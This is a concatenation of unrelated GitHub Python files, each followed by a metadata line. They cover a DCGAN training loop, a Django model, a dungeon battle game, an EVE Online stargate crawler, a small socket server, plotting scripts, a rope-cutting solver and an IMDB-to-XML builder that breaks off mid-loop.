for epoch in range(N_EPOCHS+1):
    # Loop over the data mini-batches generated by the data_loader
    for i, data_batch in enumerate(data_loader, 0):
        # a. Training the Discriminator
        # a.0. Clear out the gradients accumulated by the previous step
        discriminator.zero_grad()
        # a.1. Train the Discriminator with real images
        # Get a batch of real images
        real_images, _ = data_batch # _ => is the class label of each image, which we don't care about
        input_batch = Variable(real_images).type(dtype)
        # Define the target
        # Remember that 1 corresponds to real images and 0 corresponds to fake ones
        target_real = Variable(torch.ones(input_batch.size()[0])).type(dtype) # one label per image in the batch
        # Feed the batch to the Disc
        y_train_pred_real = discriminator(input_batch)
        # Calculate the error
        error_disc_real = criterion(y_train_pred_real, target_real)
        # a.2. Train the Discriminator with fake images
        # Generate fake images from a noise vector of size 100
        # (really 100 feature maps, each of size 1x1)
        noise_vector = Variable(torch.randn(input_batch.size()[0], 100, 1, 1)).type(dtype)
        # Use the Gen to generate a batch of fake images from the noise_vectors
        fake_images = generator(noise_vector)
        # Target: 0 for fakes
        target_fake = Variable(torch.zeros(input_batch.size()[0])).type(dtype)
        # Train the Disc on fake images; detach() keeps this backward pass
        # from flowing gradients into the Generator.
        y_train_pred_fake = discriminator(fake_images.detach())
        # Calculate the error
        error_disc_fake = criterion(y_train_pred_fake, target_fake)
        # a.3. Back-prop the total error
        # Calculate the total error
        error_disc_total = error_disc_fake + error_disc_real
        # Back-prop the total error
        error_disc_total.backward()
        # Use Adam to update the weights
        disc_opt.step()
        # b. Training the Generator
        # Zero out the gradients
        generator.zero_grad()
        # Forward propagate the fake generated images into the Discriminator to get the prediction
        y_train_gen = discriminator(fake_images)
        # Target is target_real: the Gen wants the Disc to think that
        # the images generated by it are real
        error_gen = criterion(y_train_gen, target_real)
        # Back-prop the error to the Generator
        error_gen.backward()
        gen_opt.step()
        # Progress/loss report for this step
        print(f'Epoch [{epoch}/{N_EPOCHS}] Step [{i}/{len(data_loader)}]', end=' ')
        print(f'LossDR: {error_disc_real.item():.3f}', end=' ')
        print(f'LossDF: {error_disc_fake.item():.3f}', end=' ')
        print(f'LossDT: {error_disc_total.item():.3f}', end=' ')
        print(f'LossG: {error_gen.item():.3f}')
        # Save real and fake images every 100 steps
        if i % 100 == 0:
            print('[INFO] Saving images in ./results')
            tvutils.save_image(real_images,
                               f'./results/real/real_samples_epoch_{epoch:03d}_batch_{i:03d}.png',
                               normalize=True)
            fake_images_2 = generator(noise_vector)
            tvutils.save_image(fake_images_2.data,
                               f'./results/fake/fake_samples_epoch_{epoch:03d}_batch_{i:03d}.png',
                               normalize=True)
print('DONE!')
| PavlySz/CIFAR10-GANs | dcgan.py | dcgan.py | py | 9,043 | python | en | code | 0 | github-code | 13 |
27684078643 | import hashlib
import secrets
import re
def calculate_sha256(filename):
    """Return the hex SHA-256 digest of the file at *filename*.

    The file is consumed in 4 KiB chunks so arbitrarily large files can
    be hashed without loading them fully into memory.
    """
    digest = hashlib.sha256()
    with open(filename, "rb") as stream:
        while True:
            chunk = stream.read(4096)
            if not chunk:
                break
            digest.update(chunk)
    return digest.hexdigest()
def comprobar_fila_condiciones(fila):
    """Return True if the byte row *fila* starts with the expected layout:
    8 lowercase hex chars, whitespace, 2 hex chars, whitespace, then 100.
    """
    # NOTE: '\t' inside this non-raw bytes literal is a real TAB character;
    # the pattern is kept byte-for-byte identical to preserve behaviour.
    return re.match(b'[0-9a-f]{8}(\t|\s+)[0-9a-f]{2}(\t|\s+)100', fila) is not None
def main(file1, file2):
    """Validate that *file2* extends *file1* by one well-formed row and
    that *file2*'s SHA-256 digest begins with leading zeros.

    Returns:
        tuple: (is_valid, sha256_hex_or_None, number_of_leading_zeros)
    """
    # Leer el contenido del primer archivo
    with open(file1, 'rb') as f1:
        content_file1 = f1.read()
    # Leer el contenido del segundo archivo
    with open(file2, 'rb') as f2:
        content_file2 = f2.read()
    # BUG FIX: the original did ``sum(1 for line in f2)`` *after* the with
    # block, i.e. on a closed file (ValueError at runtime) — and even inside
    # the block the cursor would already be at EOF after read(), giving 0.
    # Count the lines from the bytes we already hold instead.
    lines2 = content_file2.splitlines()
    line_count = len(lines2)
    numero_0s = 0
    if content_file2.startswith(content_file1):
        # Calcular el resumen SHA-256 del segundo archivo
        sha256_hex = calculate_sha256(file2)
        # Verificar si comienza con una secuencia de 0's
        if sha256_hex.startswith("00"):
            numero_0s = len(sha256_hex) - len(sha256_hex.lstrip('0'))
            lines1 = content_file1.splitlines()
            # BUG FIX: indexing lines1 with file2's line count walked past
            # the end of the shorter file.  The comparison below needs the
            # *last* line of file1 — TODO confirm against the exercise
            # spec, since the original code crashed before reaching here.
            last_line1 = lines1[-1]
            last_line2 = lines2[line_count - 1]        # última línea del segundo archivo
            penultima_linea2 = lines2[line_count - 2]  # penúltima línea del segundo archivo
            # file2 must end with a well-formed row appended right after
            # the unchanged last row of file1.
            if comprobar_fila_condiciones(last_line2) and penultima_linea2 == last_line1:
                return True, sha256_hex, numero_0s
    return False, None, numero_0s
6752607604 | from django.db import models
from custom_users.models import User
class Car(models.Model):
    """A car registered in the system.

    Each car belongs to exactly one owner and may additionally be rented
    by at most one other user at a time (``user`` is empty while free).
    """

    class Meta:
        verbose_name = 'Автомобиль'
        verbose_name_plural = 'Автомобили'

    # The user who owns the car.
    # NOTE(review): related_name 'uesr_owner' looks like a typo for
    # 'user_owner'; renaming it would require a migration and a caller
    # audit, so it is only flagged here.
    owner = models.ForeignKey(User, verbose_name='Хозяин автомобиля', on_delete=models.CASCADE,
                              related_name='uesr_owner')
    # The user currently renting the car; NULL/blank while it is free.
    user = models.ForeignKey(User, verbose_name='Взял в аренду', on_delete=models.CASCADE, related_name='car_to_user',
                             blank=True, null=True)
    # Production year.  NOTE(review): default=0 is a placeholder, not a
    # real year — confirm whether unset years should instead be NULL.
    year = models.IntegerField(verbose_name='год создания', default=0)
    # Display name of the car.
    name = models.CharField(verbose_name='Имя машины', max_length=255)
    # Set automatically when the record is first created.
    date = models.DateTimeField('Дата добавления машины в систему', auto_now_add=True)
| Hooliganka/verification_task | server/src/cars/models.py | models.py | py | 837 | python | en | code | 0 | github-code | 13 |
14760067692 | from argparse import ArgumentParser
import sys
import curses
from time import sleep
import tempfile
import os
from math import factorial
import random
from random import randint
class Player:
    """
    A Player explores a Maze. While exploring the maze their hunger goes down.
    Occasionally they may find an enemy that they must battle or run from.
    Players have skills they can use to traverse the maze easier.

    Attributes:
        name (str):         Represents the player
        health (float):     How much damage the player can take. Die at 0.
        maxhealth (float):  Cap of HP
        attack (float):     How much damage the player does.
        hunger (float):     How full the player is. 0 hunger is starving.
        maxhunger (float):  Cap of hunger
        speed (int):        Affects accuracy and crit chance in battle.
        starve (bool):      Is the player at 0 hunger?
        battlesFought (int): How many battles the player has fought
        battlesWon (int):   How many battles the player has won
        treasureFound (int): How many treasure cells the player passed over
        inventory (dict):   Item name -> quantity (or equip info for gear)
        abilityList (dict): Skill name -> remaining cooldown in moves
    """

    def __init__(self, name, health, attack, hunger):
        """Initialize a new Player.

        Args:
            name (str): name of the new player
            health (float): starting (and maximum) HP
            attack (float): attack damage (also the equipped sword's power)
            hunger (float): starting (and maximum) hunger
        """
        self.abilityList = {"break": 0, "jump": 0}
        self.inventory = {
            "map": 0,
            "sword": {"equip": attack, "unequip": []},
            "armor": {"equip": ("tunic", 0, 0, 5), "unequip": []},
            "small core": 0,
            "medium core": 0,
            "large core": 0,
        }
        self.name = name
        self.health = health
        self.maxhealth = health
        self.attack = attack
        self.hunger = hunger
        self.maxhunger = hunger
        self.speed = 70
        self.starve = False
        # BUG FIX: these counters are documented above and mutated by
        # battle_monsters(), but were never initialised, so the first
        # finished battle raised AttributeError.
        self.battlesFought = 0
        self.battlesWon = 0
        self.treasureFound = 0
class Enemy:
    """
    A randomly generated monster for the maze.

    Attributes:
        name (str):     tier prefix ("Frail ", ..., "Ancient ") + species
        health (float): hit points, grown by tier and tweaked per species
        speed (int):    affects accuracy and crit chance in battle
        attack (float): damage dealt per successful strike
    """

    def __init__(self):
        """Roll a random monster: species, tier, base stats, then a
        species-specific balance pass.

        NOTE: the order of the random calls (species roll, tier roll,
        attack roll, speed roll) matches the original generator exactly,
        so seeded runs produce identical monsters.
        """
        species = ["Zombie", "Kobold", "Orc", "Goblin",
                   "Skeleton", "Ghoul", "Lizardman", "Spectre"]
        self.name = species[randint(0, 7)]
        # Weighted tier roll: low tiers are far more common than high ones.
        montype = random.choice([1,1,1,1,1,1,1,1,1,2,2,2,3,3,3,4,4,5])
        # tier -> (attack range, speed range, name prefix)
        tiers = {
            1: ((40, 60), (30, 50), "Frail "),
            2: ((50, 65), (40, 55), "Haggard "),
            3: ((60, 75), (50, 70), "Skilled "),
            4: ((75, 95), (55, 60), "Elite "),
            5: ((80, 100), (60, 70), "Ancient "),
        }
        atk_range, spd_range, prefix = tiers[montype]
        self.attack = randint(*atk_range)
        self.speed = randint(*spd_range)
        self.name = prefix + self.name
        # Higher tiers get factorially more bonus HP on top of the base 100.
        self.health = factorial(montype) * 5 + 100
        # Balance pass: halve the raw attack, then apply species tweaks.
        self.attack /= 2
        # species token -> (health mult, health delta, attack mult,
        #                   attack delta, speed delta)
        tweaks = {
            "Zombie":   (0.9, 0, 1, 3, -30),
            "Kobold":   (0.7, 0, 1, 7, 5),
            "Skeleton": (0.6, 0, 1, -3, 12),
            "Orc":      (0.4, 0, 1, -7, 5),
            "Goblin":   (1.1, 0, 1, 5, 0),
            "Lizard":   (1, 0, 1.10, 0, 8),
            "Spectre":  (1, -30, 1.8, 0, 20),
        }
        for token, (hp_mult, hp_add, atk_mult, atk_add, spd_add) in tweaks.items():
            if token in self.name:
                self.health = self.health * hp_mult + hp_add
                self.attack = self.attack * atk_mult + atk_add
                self.speed += spd_add
                break
        else:
            # Ghoul (the only species with no entry above): slow, untouched
            # otherwise — same as the original final "else" branch.
            self.speed -= 30

    def __repr__(self):
        # Display the monster by its generated name.
        return self.name
def strike(entity1, entity2):
    """One attack attempt by *entity1* against *entity2*.

    A speed advantage improves both accuracy and critical-hit chance.
    On a hit, damage (90%–110% of attack, times the crit multiplier) is
    subtracted from ``entity2.health``; every outcome is printed.

    Args:
        entity1 (Player or Enemy): the attacker.
        entity2 (Player or Enemy): the defender.

    NOTE: the random rolls happen in the same order as the original
    (crit roll, accuracy roll, damage roll), so seeded runs match.
    """
    speed_gap = entity1.speed - entity2.speed
    # int() truncates toward zero, matching the original rounding for
    # negative speed gaps as well.
    accuracy = .7 + int(speed_gap / 4) / 100
    crit_chance = 3 + (int(speed_gap / 5) if speed_gap > 0 else 0)
    crit_multiplier = 1
    if randint(0, 100) < crit_chance:
        print(f"{entity1} sees a weak point in {entity2}")
        crit_multiplier = 1.5
    if randint(0, 100) <= accuracy * 100:  # accuracy roll
        damage = crit_multiplier * randint(int(entity1.attack * .9),
                                           int(entity1.attack * 1.1))
        entity2.health -= damage
        print(f"{entity1} hit {entity2} for {damage} damage")
    else:
        print(f"{entity1.name} missed")
def battle_monsters(player, monster):
    """Fight *player* against *monster* to the death, printing each blow.

    The faster combatant strikes first (ties go to *player*); the two then
    alternate strikes, re-checking the outcome after every strike.  When
    *player* is a Player instance its battle counters are updated once the
    fight is decided.

    Args:
        player (Player or Enemy): first combatant.
        monster (Enemy): second combatant.

    BUG FIX: the original duplicated the outcome checks six times and was
    inconsistent about bookkeeping — the faster-player branch never
    touched the counters, and one branch credited ``battlesWon`` when the
    *monster* had won.  The checks are deduplicated into ``_finished``
    and the counters are updated exactly once, after the battle.
    """
    def _finished():
        # Report the result if the fight is decided.  Returns None while
        # both sides live, else 'monster', 'player' or 'draw' — the same
        # precedence order the original checks used.
        if player.health <= 0 and monster.health > player.health:
            print(f"{monster.name} has won the battle against {player.name}!")
            return 'monster'
        if monster.health <= 0 and player.health > monster.health:
            print(f"{player.name} won and {monster.name} has been defeated!")
            return 'player'
        if player.health <= 0 and monster.health <= 0:
            print(f"{player.name} and {monster.name} have slain each other!")
            return 'draw'
        return None

    # Strike order: faster combatant first; ties favour the player.
    if player.speed >= monster.speed:
        first, second = player, monster
    else:
        first, second = monster, player

    result = _finished()  # handle combatants already dead on entry
    while result is None:
        strike(first, second)
        sleep(.2)
        result = _finished()
        if result is None:
            strike(second, first)
            sleep(.2)
            result = _finished()

    # Update the player's record once, regardless of who struck first.
    if isinstance(player, Player):
        player.battlesFought += 1
        if result == 'player':
            player.battlesWon += 1
# Ad-hoc smoke test, executed at import time: roll two monsters and pit
# the player against the second one, printing both monsters' health
# before and after the fight (enemy1 is a spectator and never changes).
enemy1 = Enemy()
enemy2 = Enemy()
player = Player("Nick",200,50,40)
print(f"{enemy1} has {enemy1.health}, {enemy2} has {enemy2.health}")
battle_monsters(player,enemy2)
print(f"{enemy1} has {enemy1.health}, {enemy2} has {enemy2.health}")
| NKoyfish/DungeonCrawl | sampleBattle.py | sampleBattle.py | py | 11,239 | python | en | code | 2 | github-code | 13 |
5671940541 | """
This code is released under an MIT license
"""
import networkx as nx
from esipy import App
from esipy import EsiClient
import config
graph = nx.DiGraph()
queue = list()# LIFO queue
esiapp = App.create(config.ESI_SWAGGER_JSON)
# init the client
esiclient = EsiClient(
cache=None,
headers={'User-Agent': config.ESI_USER_AGENT}
)
# Expand the module-level graph with all systems adjacent to the current
# location, out to max_depth jumps from the root:
#   - query ESI for every stargate in the current system and enqueue the
#     destinations that are not yet in the graph,
#   - retire the current system from the work list,
#   - recurse on the next queued system.
# NOTE(review): despite the original "LIFO" description, append() plus
# pop(0) is FIFO (breadth-first-like) processing — confirm which order
# is intended.
def build_graph(root, current_location, max_depth):
    """Recursively grow ``graph`` from *current_location*, pruning once the
    longest path from *root* exceeds *max_depth*.

    Relies on module globals: ``graph`` (networkx DiGraph), ``queue``
    (work list), and ``esiapp``/``esiclient`` for EVE ESI network calls.

    NOTE(review): ``nx.dag_longest_path_length(graph, root)`` passes the
    root as the second positional argument; in current NetworkX that slot
    is ``weight`` — verify against the networkx version this project pins.
    """
    if len(queue) == 0:
        return
    longest_depth = nx.dag_longest_path_length(graph, root)
    if longest_depth > max_depth:
        # Out of range: drop the deepest node and stop this branch.
        path = nx.dag_longest_path(graph, root)
        graph.remove_node(path[-1])
        return
    # Fetch the current system's info (network call) and its stargates.
    char_system_info_req = esiapp.op['get_universe_systems_system_id'](system_id=current_location)
    char_system_info = esiclient.request(char_system_info_req).data
    system_stargates = char_system_info['stargates']
    for stargate in system_stargates:
        # One more network call per stargate to learn its destination.
        char_system_stargate = esiapp.op['get_universe_stargates_stargate_id'](stargate_id=stargate)
        char_system_stargate = esiclient.request(char_system_stargate).data
        stargate_destination = str(char_system_stargate['destination']['system_id'])
        nodes = list(graph.nodes)
        # Avoid cycles (required for dag_longest_path_length): only visit
        # destinations that are not already in the graph.
        if(stargate_destination not in nodes):
            print('{} -> {}'.format(current_location, stargate_destination))
            graph.add_edge(current_location, stargate_destination)
            longest_depth = nx.dag_longest_path_length(graph, root)
            if longest_depth > max_depth:
                path = nx.dag_longest_path(graph, root)
                graph.remove_node(path[-1])
                return
            else:
                queue.append(stargate_destination)
    # Done expanding this system; retire it from the work list.
    queue.pop(0)
    longest_depth = nx.dag_longest_path_length(graph, root)
    print(longest_depth)
    if longest_depth > max_depth:
        path = nx.dag_longest_path(graph, root)
        graph.remove_node(path[-1])
        return
    # NOTE(review): queue[0] raises IndexError if the pop above emptied
    # the queue; the len() guard only protects the *next* recursive call.
    stargate_destination = queue[0]
    build_graph(root, stargate_destination, max_depth)
def build_graph_wrapper(char_location='30002267', num_of_jumps=1):
    """Seed the module-level graph and work queue with *char_location*,
    explore out to *num_of_jumps*, print the deepest level reached, and
    return the (module-level) graph.
    """
    # Default system id is the current location of Kaleb Plaude.
    graph.add_node(char_location)
    queue.append(char_location)
    build_graph(char_location, char_location, num_of_jumps)
    # Report how far from the root the crawl actually reached.
    distances = nx.shortest_path_length(graph, char_location)
    print("Total depth: {}".format(max(distances.values())))
    return graph
build_graph_wrapper()
#nx.draw(build_graph_wrapper(), with_labels=True)
#plt.show() | alexander94dmitriev/EveCanaryApp | network_remote.py | network_remote.py | py | 3,086 | python | en | code | 1 | github-code | 13 |
18068165132 | import socket
# Minimal TCP greeting server: binds to this host on port 1025 and, for
# every incoming connection, sends one fixed message and hangs up.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# gethostname() binds to the machine's primary hostname/interface, not
# necessarily 127.0.0.1.
s.bind((socket.gethostname(), 1025))
s.listen(5)  # allow up to 5 pending connections
while True:  # serve forever; stop with Ctrl-C
    clt_soc, clt_add = s.accept()
    print(f"Connection to {clt_add} established")
    # Send the greeting, then immediately close the client socket.
    clt_soc.send(bytes("Socket Programming", "utf-8"))
    clt_soc.close()
| kumarjeetray/Python_Programs | Socket Programming/SET II/SERVER2.py | SERVER2.py | py | 299 | python | en | code | 0 | github-code | 13 |
44340453635 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 06 06:11:42 2017
@author: Yunho
"""
from ggplot import *
import pandas as pd
# Gallery of ggplot examples using the library's bundled sample datasets
# (mpg, meat, mtcars, diamonds, chopsticks).
# NOTE(review): these are bare expressions — presumably this runs in a
# Jupyter/IPython session where each result renders automatically; in a
# plain script nothing would be displayed.
# Adding a Title
ggplot(mpg, aes(x='cty', y='hwy')) + \
    geom_point() + \
    ggtitle("City vs. Highway Miles per Gallon")
# Adding Labels
ggplot(mpg, aes(x='cty')) + \
    geom_histogram() + \
    xlab("City MPG (Miles per Gallon)") + \
    ylab("# of Obs")
# Adjusting Shapes
ggplot(mpg, aes(x='cty', y='hwy', shape='trans')) + geom_point()
# Area Chart
ggplot(meat, aes(x='date', y='beef')) + \
    geom_area() + \
    scale_x_date(labels='%Y')
# Bar Chart
ggplot(mtcars, aes(x='factor(cyl)', fill='factor(gear)')) + geom_bar()
# Boxplots
ggplot(mtcars, aes(x='factor(cyl)', y='mpg')) + geom_boxplot()
# Color Palettes
ggplot(diamonds, aes(x='carat', y='price', color='clarity')) + \
    geom_point() + \
    scale_color_brewer()
# Faceting Basics
# NOTE(review): df is assigned but never used below.
df = pd.melt(meat, id_vars="date")
ggplot(diamonds, aes(x='carat', y='price', color='cut')) + \
    geom_point() + \
    facet_grid("clarity", "color")
ggplot(diamonds, aes(x='carat', y='price')) + \
    stat_smooth(method='loess') + \
    facet_grid("clarity", "cut")
# Scatter Plot
ggplot(chopsticks, aes(x='individual', y='food_pinching_effeciency')) + geom_point()
# Smoothed Line Chart
ggplot(meat, aes(x='date', y='beef')) + \
    geom_point() + \
    stat_smooth(ma=12, color='coral')
| yunho0130/Python_Lectures | 2018_02_SMU_Lecture_Slide/ch10/code/ggplot_jupyter.py | ggplot_jupyter.py | py | 1,391 | python | en | code | 225 | github-code | 13 |
17427571218 | """
def splitRope(RemainingLength,possibleSplits,cuts,combinations):
if ( RemainingLength < 0 ) or len([x for x in possibleSplits if x <= RemainingLength]) == 0 :
del cuts[-1]
return combinations,cuts
for splitAt in possibleSplits:
if RemainingLength - splitAt == 0:
cuts.append(splitAt)
combinations.add(tuple(cuts))
cuts=[]
elif RemainingLength - splitAt >= 0:
cuts.append(splitAt)
combinations,cuts = splitRope(RemainingLength = (RemainingLength - splitAt), possibleSplits=possibleSplits, cuts=cuts,combinations=combinations )
return combinations,[]
if __name__ == '__main__':
TotalLength = int(input('Enter the total length of the rope: '))
possibleSplits = list(map(int,input("Enter 3 numbers(Comma seperated) for splitting the rope: ").split(',')))
cuts=list()
combinations=set()
combinations,cuts = splitRope(RemainingLength=TotalLength, possibleSplits=possibleSplits, cuts=cuts, combinations=combinations)
print(combinations)
"""
from functools import lru_cache


@lru_cache(maxsize=None)
def maxPieces(n, a, b, c):
    """Maximum number of pieces a rope of length *n* can be cut into,
    using only cuts of length *a*, *b* or *c*.

    Returns:
        int: the maximum piece count, or -1 when no combination of the
        three cut lengths sums exactly to *n*.
    """
    if n == 0:
        return 0   # nothing left: a valid (empty) cutting
    if n < 0:
        return -1  # overshot: this branch is infeasible
    # Best result over the three possible next cuts.  lru_cache memoises
    # each remaining length, turning the original exponential recursion
    # into O(n) distinct subproblems.
    best = max(maxPieces(n - a, a, b, c),
               maxPieces(n - b, a, b, c),
               maxPieces(n - c, a, b, c))
    return -1 if best < 0 else best + 1
if __name__ == "__main__":
TotalLength = int(input('Enter the total length of the rope: '))
a,b,c=map(int,input("Enter 3 numbers(Comma seperated) for splitting the rope: ").split(','))
print(maxPieces(TotalLength,a,b,c)) | vigneshSr91/MyProjects | Exercise37-RopeCuttingRecursive.py | Exercise37-RopeCuttingRecursive.py | py | 1,556 | python | en | code | 0 | github-code | 13 |
3583607273 | # 전기버스 2
# time : 40m
# idea
'''
현재 가진 배터리로 갈 수 있는 모든 특정 정류소에서 충전하는 경우 모든 것을 다 고려 후, 가지치기 진행하기
→ DFS + charge_cnt 기준으로 가지치기
'''
def charge_times(s, cnt): # find the minimum number of charges
    """DFS over bus stops: from stop *s*, having charged *cnt* times so
    far, try every stop reachable on the current charge and record the
    minimum charge count needed to reach the last stop in the
    module-level ``min_cnt``.

    Relies on module globals: ``n`` (number of stops), ``charge`` (fuel
    available at each stop) and ``min_cnt`` (best count found so far).
    """
    global min_cnt # best (smallest) charge count found so far
    if cnt >= min_cnt: # prune: already no better than the current best
        return # abandon this branch
    if s >= n - 1: # reached (or passed) the terminal stop
        if cnt < min_cnt: # record a new best
            min_cnt = cnt
        return min_cnt  # NOTE(review): return value is ignored by callers
    avail = charge[s] # fuel available at the current stop
    for i in range(1, avail + 1): # every stop reachable on this charge
        charge_times(s + i, cnt + 1) # recurse, counting one more charge
# Driver: the first input line holds the number of test cases; each
# following line is "N fuel_0 ... fuel_{N-1}".
t = int(input())
for tc in range(1, t + 1):
    info = list(map(int, input().split()))
    n = info[0] # number of stops
    charge = info[1:] # fuel available at each stop
    min_cnt = len(charge) # initial bound: charging at every stop
    charge_times(0, 0) # start DFS at stop 0 with zero charges so far
    # NOTE(review): the DFS counts the boarding at stop 0 as a charge,
    # hence the -1 — presumably the initial charge is free; confirm
    # against the problem statement.
    print(f'#{tc} {min_cnt - 1}')
18091839822 | #!/usr/bin/python
######################################################################
# Name: ALaDyn_plot_utilities_Energy_Density.py
# Author: F.Mira
# Date: 2016-05-25
# Purpose: it is a module of: ALaDyn_plot_sections - plots energy density
# Source: python
#####################################################################
### loading shell commands
import os, os.path
import numpy as np
###>>>
# home_path = os.path.expanduser('~')
# sys.path.append(os.path.join(home_path,'Codes/ALaDyn_Code/tools-ALaDyn/ALaDyn_Pythons'))
###>>>
from read_ALaDyn_bin import *
from utilities_1 import *
### --- ###
#- plot Sections
def plot_energy_density_sections(path,frame,Energy_density_min,Energy_density_max,isolines,celltocut,sliceposition_x,sliceposition_y,sliceposition_z,magnification_fig,savedata):
s='%2.2i'%frame #conversion to 2-character-long-string
file_name = 'Elenout'+s+'.bin'
matrix3, x,y,z = read_ALaDyn_bin(path,file_name,'grid')
#- cut & sign
matrix3 = np.abs( matrix3 )
print('Energy_density_max >>', np.max([np.max(matrix3)]))
print('Energy_density_min >>', np.min([np.min(matrix3)]))
#---cut edges---#
if celltocut > 0:
matrix3 = matrix3[:,celltocut:-celltocut,celltocut:-celltocut]
y = y[celltocut:-celltocut]
z = z[celltocut:-celltocut]
p = matrix3.shape
x2=p[0]/2+sliceposition_x; y2=p[1]/2+sliceposition_y; z2=p[2]/2+sliceposition_z;
sizeX, sizeZ = figure_dimension_inch(x,y,z,magnification_fig)
levs_lin = np.linspace( Energy_density_min , Energy_density_max ,isolines)
levs_log = np.logspace(log10(Energy_density_min),log10(Energy_density_max),isolines)
#--------------------#
#--- Linear plots ---#
#--------------------#
#- Plot Elenout -#
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,y,matrix3[:,:,z2].T,levs_lin, linewidths = 0.00001)
axis('tight')
name_output = 'Energy_density_XY_lin_'+s+'.png'
savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,z,matrix3[:,y2,:].T,levs_lin, linewidths = 0.00001)
axis('tight')
name_output = 'Energy_density_XZ_lin_'+s+'.png'
fig.savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
#--------------------#
#--- Log plots ---#
#--------------------#
#- Plot Elenout -#
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,y,matrix3[:,:,z2].T, levs_log, norm=colors.LogNorm())
axis('tight')
name_output = 'Energy_density_XY_log_'+s+'.png'
savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
fig = figure(1, figsize=(sizeX, sizeZ))
contourf(x,z,matrix3[:,y2,:].T,levs_log, norm=colors.LogNorm())
axis('tight')
name_output = 'Energy_density_XZ_log_'+s+'.png'
fig.savefig( os.path.join(path,'plots','Energy_density',name_output) )
close(fig)
# fig = figure(1, figsize=(sizeZ, sizeZ))
# contourf(y,z,matrix[x2,:,:].T, levs_log, norm=colors.LogNorm())
# axis('tight')
# name_output = 'rho_Bunch_YZ_log_'+s+'.png'
# fig.savefig( os.path.join(path,'plots','rho',name_output) )
# close(fig)
#----- Save density sections data -----#
if (savedata == 'True'):
print('saving Energy_density data')
Energy_density = matrix3
p = Energy_density.shape
x2=p[0]/2+sliceposition_x; y2=p[1]/2+sliceposition_y; z2=p[2]/2+sliceposition_z;
np.savetxt( os.path.join(path,'data','Energy_density',('Energy_Density'+('%2.2i'%frame)+'.dat')),Energy_density[:,:,z2].T,fmt='%15.14e')
# np.savetxt( 'rho_section_'+('%2.2i'%frame)+'.dat' ,rho[:,:,z2].T,fmt='%15.14e')
# np.savetxt( 'rho_b_section_'+('%2.2i'%frame)+'.dat' ,rho_b[:,:,z2].T,fmt='%15.14e')
| ALaDyn/tools-ALaDyn | pythons/utility_energy_density.py | utility_energy_density.py | py | 3,693 | python | en | code | 6 | github-code | 13 |
27839014475 | import pandas as pd
import xml.etree.ElementTree as ET
import sys
from random import *
import importlib
# load all data in Panda dataframes
# titles information
tittleInfo = pd.read_csv( "tittle_basics1.tsv", sep='\t' ) #100k
tittleCrew = pd.read_csv( "tittle_crew1.tsv", sep='\t' )
tittleRatings = pd.read_csv( "tittle_ratings.tsv", sep='\t')
tittleEpisode = pd.read_csv( "tittle_episode1.tsv", sep='\t')
tittlePrinciple = pd.read_csv("tittle_principles1.tsv", sep='\t')
nameBasics = pd.read_csv("name_basics1.tsv",sep='\t')
tittleMovies = tittleInfo.loc[ tittleInfo['titleType'] == 'movie'] #7k
tittleSeries = tittleInfo.loc[ tittleInfo['titleType'] == 'tvSeries'] #4k
tittleEP = tittleInfo.loc[ tittleInfo['titleType'] == 'tvEpisode']
tittleInfo.runtimeMinutes.replace(to_replace="\\N",value="120",inplace=True)
root = ET.Element("IMDB")
Movies = ET.SubElement(root,"Movies")
#DF.empty , df[ df.col == 'val'] //for searching
for i in range(0,10):
movie = ET.SubElement(Movies,"Movie")
ptitle = tittleMovies.primaryTitle.iloc[i] #string
genres = tittleMovies.genres.iloc[i] #string maybe aaray also
year = tittleMovies.startYear.iloc[i] #int
runtime = tittleMovies.runtimeMinutes.iloc[i] #string
tconst = tittleMovies.tconst.iloc[i] #string
#temp Dataframe for getiing ratings
rateDF = tittleRatings[ tittleRatings['tconst']== tconst]
rating = " "
if(rateDF.empty==False):
rating = rateDF.averageRating.iloc[0] #np.float
#generate xml
Title = ET.SubElement(movie,"Title")
Title.text = ptitle
Crew = ET.SubElement(movie,"Crew")
Director = ET.SubElement(Crew,"Director")
#get director info
dirDF = tittleCrew[ tittleCrew['tconst']== tconst]
if(dirDF.empty==False):
dirIDList = (dirDF.directors.iloc[0]).split(',')
dirID = dirIDList[0] #TODO one or more Directors
Director.text = str(dirID)
else :
Director.text = ""
#add casts
Stars = ET.SubElement(Crew,"Cast")
castDF = tittlePrinciple[tittlePrinciple['tconst']==tconst]
if(castDF.empty==False):
castIDList = (castDF.principalCast.iloc[0]).split(',')
for castID in castIDList:
castIDT = ET.SubElement(Stars,"CelebRef")
castIDT.text = str(castID)
#add genre
Genre = ET.SubElement(movie,"Genres")
genreList = genres.split(',')
for gtext in genreList :
genre = ET.SubElement(Genre,"Genre")
genre.text = gtext
Desc = ET.SubElement(movie,"Description")
Year = ET.SubElement(Desc,"Year")
Year.text = str(year)
rtime = ET.SubElement(Desc,"RunTime")
rtime.text = runtime
Rate = ET.SubElement(movie,"Ratings")
Rate.text = str(rating)
TVshows = ET.SubElement(root,'TVshows')
#DF.empty , df[ df.col == 'val'] //for searching
for i in range(0,100):
TVshow = ET.SubElement(TVshows,"TVshow")
ptitle = tittleSeries.primaryTitle.iloc[i] #string
genres = tittleSeries.genres.iloc[i] #string maybe aaray also
year = tittleSeries.startYear.iloc[i] #int
runtime = tittleSeries.runtimeMinutes.iloc[i] #string
tconst = tittleSeries.tconst.iloc[i] #string
TVshow.set("TvShowID",str(tconst))
#temp Dataframe for getiing ratings
rateDF = tittleRatings[ tittleRatings['tconst']== tconst]
rating = " "
if(rateDF.empty==False):
rating = rateDF.averageRating.iloc[0] #np.float
#generate xml
Title = ET.SubElement(TVshow,"Title")
Title.text = str(ptitle)
Crew = ET.SubElement(TVshow,"Crew")
Director = ET.SubElement(Crew,"Director")
#get director info
dirDF = tittleCrew[ tittleCrew['tconst']== tconst]
if(dirDF.empty==False):
dirIDList = (dirDF.directors.iloc[0]).split(',')
dirID = dirIDList[0] #TODO one or more Directors
Director.text = str(dirID)
else :
Director.text = ""
#add casts
Stars = ET.SubElement(Crew,"Cast")
castDF = tittlePrinciple[tittlePrinciple['tconst']==tconst]
if(castDF.empty==False):
castIDList = (castDF.principalCast.iloc[0]).split(',');
for castID in castIDList:
castIDT = ET.SubElement(Stars,"CelebRef")
castIDT.text = str(castID)
#add genre
